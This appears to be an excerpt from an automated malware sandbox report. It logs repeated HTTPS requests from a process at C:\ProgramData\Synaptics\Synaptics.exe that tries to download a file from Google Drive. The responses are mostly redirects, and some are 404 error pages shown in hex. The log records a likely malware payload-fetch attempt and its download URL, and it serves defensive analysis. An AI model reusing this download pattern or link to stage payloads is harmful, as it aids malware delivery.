                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    129192.168.2.452207142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:15 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-p511XniI2k0uPEePjIs4JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    130192.168.2.452219142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:16 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4UuT_WBq0Roa47Hoa2ew4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    131192.168.2.452222142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4SeyMHj9Lfe454oefTwB1QRoxiNWRVSc_WbOg3bN2ewcQxotIigl-uUSHTBtbZDkmsaRSVEVw
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:16 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wc7_UZj-iAnlGJT36rh-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 35 56 54 46 32 4a 75 6f 72 35 4b 64 4a 30 6a 71 4f 68 77 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="25VTF2Juor5KdJ0jqOhwYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    132192.168.2.452220142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:16 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC64g9J-pAR9wvUI_5qm8AcD0VYDCCp5MABERRLaPLMdeu2vfvPYtIGEWhHOxTj6ClET817RlBM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:17 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d7dacOvTkv3MZCE7L9DuCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 34 4e 63 68 38 36 59 78 7a 53 6d 4f 76 36 2d 5f 69 46 75 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="w4Nch86YxzSmOv6-_iFugQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    133192.168.2.452221142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:16 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:16 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DrGBBh5pM-fpOxQ6B_-a4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    134192.168.2.452229142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:17 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ybbY76QI_7IF2HxjiIK90Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    135192.168.2.452228142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:17 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-deZhAHgosGq0cdt0NG0uow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    136192.168.2.452230142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:17 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6CrFhy2F3i4tvTNMrYK0lnsTZNxNX0d1RMHv6uIZDTLsZk7oBaJFwRZWbhgDjnhVxSQnYwEQM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:17 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d8v0ZT8x75wYa0srEFz8hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
